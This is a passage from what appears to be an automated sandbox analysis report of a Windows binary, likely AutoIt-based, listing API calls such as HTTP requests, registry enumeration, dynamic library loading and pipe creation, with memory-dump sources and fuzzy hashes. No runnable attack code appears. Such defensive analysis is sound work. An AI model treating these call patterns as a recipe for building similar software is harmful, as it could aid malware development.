                                                                    • VariantInit.OLEAUT32(?), ref: 01048613
                                                                    • CharUpperBuffW.USER32(?,?), ref: 01048722
                                                                    • VariantClear.OLEAUT32(?), ref: 0104889A
                                                                      • Part of subcall function 01037562: VariantInit.OLEAUT32(00000000), ref: 010375A2
                                                                      • Part of subcall function 01037562: VariantCopy.OLEAUT32(00000000,?), ref: 010375AB
                                                                      • Part of subcall function 01037562: VariantClear.OLEAUT32(00000000), ref: 010375B7
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: Variant$ClearInit$BuffCharCopyUpper
                                                                    • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                    • API String ID: 4237274167-1221869570
                                                                    • Opcode ID: 41299138b71dd654b45952ede9d34d8a72e3327c498e60a93380a6fde79d9fa9
                                                                    • Instruction ID: c125cafec0ccabeed0a317757ed134fb1511c8cfc14c7ef80dca032c000b06f5
                                                                    • Opcode Fuzzy Hash: 41299138b71dd654b45952ede9d34d8a72e3327c498e60a93380a6fde79d9fa9
                                                                    • Instruction Fuzzy Hash: D4919EB16083019FC750EF68C48495ABBE5FF89714F088D6EF98A8B361DB35E905CB52
                                                                    APIs
                                                                      • Part of subcall function 00FEFC86: _wcscpy.LIBCMT ref: 00FEFCA9
                                                                    • _memset.LIBCMT ref: 01032B87
                                                                    • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 01032BB6
                                                                    • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 01032C69
                                                                    • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 01032C97
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: ItemMenu$Info$Default_memset_wcscpy
                                                                    • String ID: 0
                                                                    • API String ID: 4152858687-4108050209
                                                                    • Opcode ID: 202d2cf5b37fb609efe5abd3674a75d97c40e2563799791b9105c04be77708c5
                                                                    • Instruction ID: 027c374588869be0143d9bd327b324d55a893b29247eabb86c70f1c79d002e90
                                                                    • Opcode Fuzzy Hash: 202d2cf5b37fb609efe5abd3674a75d97c40e2563799791b9105c04be77708c5
                                                                    • Instruction Fuzzy Hash: 5E5100715183099BE765DE68C844A6BBBECEFC5310F040A6EFAC4D72A1DB74C904D752
                                                                    APIs
                                                                    • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0102D5D4
                                                                    • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 0102D60A
                                                                    • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 0102D61B
                                                                    • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 0102D69D
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorMode$AddressCreateInstanceProc
                                                                    • String ID: DllGetClassObject
                                                                    • API String ID: 753597075-1075368562
                                                                    • Opcode ID: f08c9ee280b379143f08e044ff774c709464a9350c53b59c8bb2e16e433d6773
                                                                    • Instruction ID: 18006bafaa023195fc6a82ac04e39d8277290fb627bf0ba36f6167f4dd9afa52
                                                                    • Opcode Fuzzy Hash: f08c9ee280b379143f08e044ff774c709464a9350c53b59c8bb2e16e433d6773
                                                                    • Instruction Fuzzy Hash: 2441C3B1600215EFDB25DF94C888A9A7BBAEF48310F1180ADED49DF205D7B5DD44CBA0
                                                                    APIs
                                                                    • _memset.LIBCMT ref: 010327C0
                                                                    • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 010327DC
                                                                    • DeleteMenu.USER32(?,00000007,00000000), ref: 01032822
                                                                    • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,01095890,00000000), ref: 0103286B
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: Menu$Delete$InfoItem_memset
                                                                    • String ID: 0
                                                                    • API String ID: 1173514356-4108050209
                                                                    • Opcode ID: 2a7ad69602d81f97dd281d76ce29cff4e31fdfe81021f547f49ad276bcfa809e
                                                                    • Instruction ID: dc2d34d20a1ea4a6e56515f7f2d89621abfd5971d0bcc1f4c99e1bfd65f6004b
                                                                    • Opcode Fuzzy Hash: 2a7ad69602d81f97dd281d76ce29cff4e31fdfe81021f547f49ad276bcfa809e
                                                                    • Instruction Fuzzy Hash: 0341B0702053029FD720DF28C844B6ABBE9EFC5314F14496EFAE697291D734E905CB52
                                                                    APIs
                                                                    • CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 0104D7C5
                                                                      • Part of subcall function 00FD784B: _memmove.LIBCMT ref: 00FD7899
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: BuffCharLower_memmove
                                                                    • String ID: cdecl$none$stdcall$winapi
                                                                    • API String ID: 3425801089-567219261
                                                                    • Opcode ID: 5405f0eea5df81b194e58c892de67b71c9267eaf48a29d12207048735b2b2be6
                                                                    • Instruction ID: 7b3a2d67ad2c287cdb5b3eec034e32faf4d96e21aa1f7a3be183adff3b769f30
                                                                    • Opcode Fuzzy Hash: 5405f0eea5df81b194e58c892de67b71c9267eaf48a29d12207048735b2b2be6
                                                                    • Instruction Fuzzy Hash: 8131C5705046199BDF00EF98CC919FEB3B5FF14320B10866AE8A9977D2DB35E905CB80
                                                                    APIs
                                                                      • Part of subcall function 00FD7DE1: _memmove.LIBCMT ref: 00FD7E22
                                                                      • Part of subcall function 0102AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0102AABC
                                                                    • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 01028F14
                                                                    • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 01028F27
                                                                    • SendMessageW.USER32(?,00000189,?,00000000), ref: 01028F57
                                                                      • Part of subcall function 00FD7BCC: _memmove.LIBCMT ref: 00FD7C06
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$_memmove$ClassName
                                                                    • String ID: ComboBox$ListBox
                                                                    • API String ID: 365058703-1403004172
                                                                    • Opcode ID: 93d101ae54bf3b4009d8ffa933873f9f3dd3e8756cc550d57879241d9efa8f5e
                                                                    • Instruction ID: 3c00d37b282267b6ebce801be18b80aaf3de30b9d562d90f8acf993e07d9e452
                                                                    • Opcode Fuzzy Hash: 93d101ae54bf3b4009d8ffa933873f9f3dd3e8756cc550d57879241d9efa8f5e
                                                                    • Instruction Fuzzy Hash: 5F21F875A04205BEDB54ABB4CC45CFFB7AADF45360F04851BF591572E1DB3D48099620
                                                                    APIs
                                                                    • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0104184C
                                                                    • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 01041872
                                                                    • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 010418A2
                                                                    • InternetCloseHandle.WININET(00000000), ref: 010418E9
                                                                      • Part of subcall function 01042483: GetLastError.KERNEL32(?,?,01041817,00000000,00000000,00000001), ref: 01042498
                                                                      • Part of subcall function 01042483: SetEvent.KERNEL32(?,?,01041817,00000000,00000000,00000001), ref: 010424AD
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                                                    • String ID:
                                                                    • API String ID: 3113390036-3916222277
                                                                    • Opcode ID: 434dfe2a9b7bd064b7320b60f0ea0d54a83a3856585ce817b34492ea4d0c73a0
                                                                    • Instruction ID: 921475e60e517da7455000d619c7eeb3cb73d5642d7f8e8de2d3810cd2fed77b
                                                                    • Opcode Fuzzy Hash: 434dfe2a9b7bd064b7320b60f0ea0d54a83a3856585ce817b34492ea4d0c73a0
                                                                    • Instruction Fuzzy Hash: 9A217FB1600309BFFB119A64DCC4EBF7BEDEB88644F00413EF585D6140EA79AD4597A1
                                                                    APIs
                                                                      • Part of subcall function 00FD1D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00FD1D73
                                                                      • Part of subcall function 00FD1D35: GetStockObject.GDI32(00000011), ref: 00FD1D87
                                                                      • Part of subcall function 00FD1D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00FD1D91
                                                                    • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 01056461
                                                                    • LoadLibraryW.KERNEL32(?), ref: 01056468
                                                                    • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 0105647D
                                                                    • DestroyWindow.USER32(?), ref: 01056485
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                                    • String ID: SysAnimate32
                                                                    • API String ID: 4146253029-1011021900
                                                                    • Opcode ID: 825494e17fec1fbc25ac633d7dc6bb1b654b510b1af64a11e96ef04740effa25
                                                                    • Instruction ID: fd6915a31538fa90696e208d727eff65f3909f0961e5890a6ec05947c8965485
                                                                    • Opcode Fuzzy Hash: 825494e17fec1fbc25ac633d7dc6bb1b654b510b1af64a11e96ef04740effa25
                                                                    • Instruction Fuzzy Hash: 5C21C271100205BFEF914E68DC50EBB7BEEEB48364F904629FE9093192CB36DC419B20
                                                                    APIs
                                                                    • GetStdHandle.KERNEL32(0000000C), ref: 01036DBC
                                                                    • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 01036DEF
                                                                    • GetStdHandle.KERNEL32(0000000C), ref: 01036E01
                                                                    • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 01036E3B
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: CreateHandle$FilePipe
                                                                    • String ID: nul
                                                                    • API String ID: 4209266947-2873401336
                                                                    • Opcode ID: df339a17bb8f71bec549bfd39ee474a507310f1d99f76634d7aaf5b179a1ef6c
                                                                    • Instruction ID: a8cb35c91872d954cfba26f67b66ed3a060a6ce774e6fa823421562e3dec7dd0
                                                                    • Opcode Fuzzy Hash: df339a17bb8f71bec549bfd39ee474a507310f1d99f76634d7aaf5b179a1ef6c
                                                                    • Instruction Fuzzy Hash: E221657590030ABBDB20AF29D808A9A7BFCEF85720F104A59FDE1D72D0DB729654CB54
                                                                    APIs
                                                                    • GetStdHandle.KERNEL32(000000F6), ref: 01036E89
                                                                    • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 01036EBB
                                                                    • GetStdHandle.KERNEL32(000000F6), ref: 01036ECC
                                                                    • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 01036F06
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: CreateHandle$FilePipe
                                                                    • String ID: nul
                                                                    • API String ID: 4209266947-2873401336
                                                                    • Opcode ID: 7c1e3c123b2b6046db3ef45f0d331f53cfd57ffa5afbcd3ddf565e9a7cb40468
                                                                    • Instruction ID: 869a1d8eb8d9c463f622f5a8c9f33326163f5fcae8c6f293cda8e9916bb2816d
                                                                    • Opcode Fuzzy Hash: 7c1e3c123b2b6046db3ef45f0d331f53cfd57ffa5afbcd3ddf565e9a7cb40468
                                                                    • Instruction Fuzzy Hash: 63219071500306ABEB209F6DC804AAA77ECEF85720F200A59F9E0D72C0DB76A6548B60
                                                                    APIs
                                                                    • SetErrorMode.KERNEL32(00000001), ref: 0103AC54
                                                                    • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 0103ACA8
                                                                    • __swprintf.LIBCMT ref: 0103ACC1
                                                                    • SetErrorMode.KERNEL32(00000000,00000001,00000000,0105F910), ref: 0103ACFF
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorMode$InformationVolume__swprintf
                                                                    • String ID: %lu
                                                                    • API String ID: 3164766367-685833217
                                                                    • Opcode ID: f1937eababa80b27a14b1119e3e12e35e32b1617eadc393bf49b4d5a5db8b23c
                                                                    • Instruction ID: 96e44bcc0048dbc71ebf313e44e3955b3d38733e1f118b045f52056d96eec76f
                                                                    • Opcode Fuzzy Hash: f1937eababa80b27a14b1119e3e12e35e32b1617eadc393bf49b4d5a5db8b23c
                                                                    • Instruction Fuzzy Hash: 52216031A0020AAFCB10EF69C944DEF7BB8EF89714B044069F949DB351DA75EA41DB61
                                                                    APIs
                                                                    • CharUpperBuffW.USER32(?,?), ref: 01031B19
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: BuffCharUpper
                                                                    • String ID: APPEND$EXISTS$KEYS$REMOVE
                                                                    • API String ID: 3964851224-769500911
                                                                    • Opcode ID: 82c369661b978d5912cfb843f79d7fb1d2136a7b9a0f982145f2a879360ea82b
                                                                    • Instruction ID: 77893af6ad9103f6c716f5dea66f0f46e196ebbdf6ca7fada2068410e89d036d
                                                                    • Opcode Fuzzy Hash: 82c369661b978d5912cfb843f79d7fb1d2136a7b9a0f982145f2a879360ea82b
                                                                    • Instruction Fuzzy Hash: C511C4309002098FCF04FFA8DC618FEB3B4FF59304B548495D89467792EB365906DB50
                                                                    APIs
                                                                    • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0104EC07
                                                                    • GetProcessIoCounters.KERNEL32(00000000,?), ref: 0104EC37
                                                                    • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 0104ED6A
                                                                    • CloseHandle.KERNEL32(?), ref: 0104EDEB
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                                                    • String ID:
                                                                    • API String ID: 2364364464-0
                                                                    • Opcode ID: 1fdf9c198d368ae23ec55eb020f97bc67d5cb3589c823ce8ecd468e3d3fe8f1d
                                                                    • Instruction ID: 9f848717c961e3f893639ff3eca7b5f0793c3e83f10fcf11f2d29b13a19ec40a
                                                                    • Opcode Fuzzy Hash: 1fdf9c198d368ae23ec55eb020f97bc67d5cb3589c823ce8ecd468e3d3fe8f1d
                                                                    • Instruction Fuzzy Hash: 658160B16043019FD760EF28CC86F2AB7E6AF44710F44881EF995DB3D2D6B9AC418B91
                                                                    APIs
                                                                      • Part of subcall function 00FD7DE1: _memmove.LIBCMT ref: 00FD7E22
                                                                      • Part of subcall function 01050E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0104FDAD,?,?), ref: 01050E31
                                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 010500FD
                                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0105013C
                                                                    • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 01050183
                                                                    • RegCloseKey.ADVAPI32(?,?), ref: 010501AF
                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 010501BC
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
                                                                    • String ID:
                                                                    • API String ID: 3440857362-0
                                                                    • Opcode ID: aed50647d7b62bde7a692dcdf87f227bcb95f1877f42eeb53c9a82b45ba1e66c
                                                                    • Instruction ID: 3f780180c723a9d9ba9ce850ab3635ae1abc64dd71568dcddf438a288c1785f6
                                                                    • Opcode Fuzzy Hash: aed50647d7b62bde7a692dcdf87f227bcb95f1877f42eeb53c9a82b45ba1e66c
                                                                    • Instruction Fuzzy Hash: 4B516631208205AFD754EF68CC81EAFB7E9AF84304F44481EF9858B291EB35E904DB52
                                                                    APIs
                                                                      • Part of subcall function 00FD9837: __itow.LIBCMT ref: 00FD9862
                                                                      • Part of subcall function 00FD9837: __swprintf.LIBCMT ref: 00FD98AC
                                                                    • LoadLibraryW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 0104D927
                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 0104D9AA
                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 0104D9C6
                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 0104DA07
                                                                    • FreeLibrary.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,?,?), ref: 0104DA21
                                                                      • Part of subcall function 00FD5A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,01037896,?,?,00000000), ref: 00FD5A2C
                                                                      • Part of subcall function 00FD5A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,01037896,?,?,00000000,?,?), ref: 00FD5A50
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
                                                                    • String ID:
                                                                    • API String ID: 327935632-0
                                                                    • Opcode ID: d540b1ae43455bd2589052d8b8cc33d177ab42273d2fb9149c67427329f52fbc
                                                                    • Instruction ID: 7a044ab9e2d1a87a748163808699719138162965cb427d46a383bbff7135dba3
                                                                    • Opcode Fuzzy Hash: d540b1ae43455bd2589052d8b8cc33d177ab42273d2fb9149c67427329f52fbc
                                                                    • Instruction Fuzzy Hash: 6A513D75A04205DFCB00EFA8C4949ADB7F6FF19310B0880AAE895AB312D739ED45CF91
                                                                    APIs
                                                                    • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 0103E61F
                                                                    • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 0103E648
                                                                    • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 0103E687
                                                                      • Part of subcall function 00FD9837: __itow.LIBCMT ref: 00FD9862
                                                                      • Part of subcall function 00FD9837: __swprintf.LIBCMT ref: 00FD98AC
                                                                    • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 0103E6AC
                                                                    • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 0103E6B4
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
